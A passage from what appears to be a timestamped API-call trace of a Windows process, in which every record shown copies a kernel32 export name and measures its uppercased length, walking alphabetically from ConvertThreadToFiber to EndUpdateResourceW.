lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.266] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.266] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.266] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.267] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.267] lstrlenA (lpString="COPYFILEA") returned 9 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.267] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.267] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.267] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.267] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.267] lstrlenA (lpString="COPYFILEW") returned 9 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.267] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.267] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.267] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.267] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.267] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.267] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.267] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.267] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.267] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.267] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.267] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.267] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.268] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.268] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.268] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.268] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.268] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.268] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.268] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.268] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.268] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.268] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.268] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.268] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.268] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.268] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.268] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.268] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.268] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.268] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.268] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.268] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.268] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.268] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.268] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.268] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.268] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.268] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.268] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.268] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.268] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.268] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.268] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.269] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.269] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.269] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.269] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.269] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.269] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.269] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.269] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.269] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.269] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.269] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.269] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.269] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.269] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.269] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.270] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.270] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.270] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.270] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.270] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.270] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.270] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.270] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.270] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.270] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.270] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.270] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.270] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.270] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.270] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.270] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.270] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.270] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.270] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.271] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.271] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.271] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.271] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.271] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.271] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.271] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.271] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.271] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.271] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.271] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.271] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.271] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.271] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.271] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.271] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.271] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.271] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.271] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.272] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.272] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.272] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.272] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.272] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.272] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.272] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.272] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.272] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.272] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.272] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.272] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.272] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.272] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.272] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.272] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.272] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.272] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.272] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.272] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.272] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.272] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.272] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.272] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.272] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.272] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.272] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.272] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.273] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.273] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.273] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.273] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.273] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.273] lstrlenA (lpString="DELETEATOM") returned 10 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.273] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.273] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.273] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.273] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.273] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.273] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.273] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.273] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.273] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.273] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.273] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.273] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.273] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.274] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.274] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.274] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.274] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.274] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.274] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.274] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.274] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.274] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.274] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.274] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.274] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.274] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.274] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.274] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.274] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.274] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.274] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: 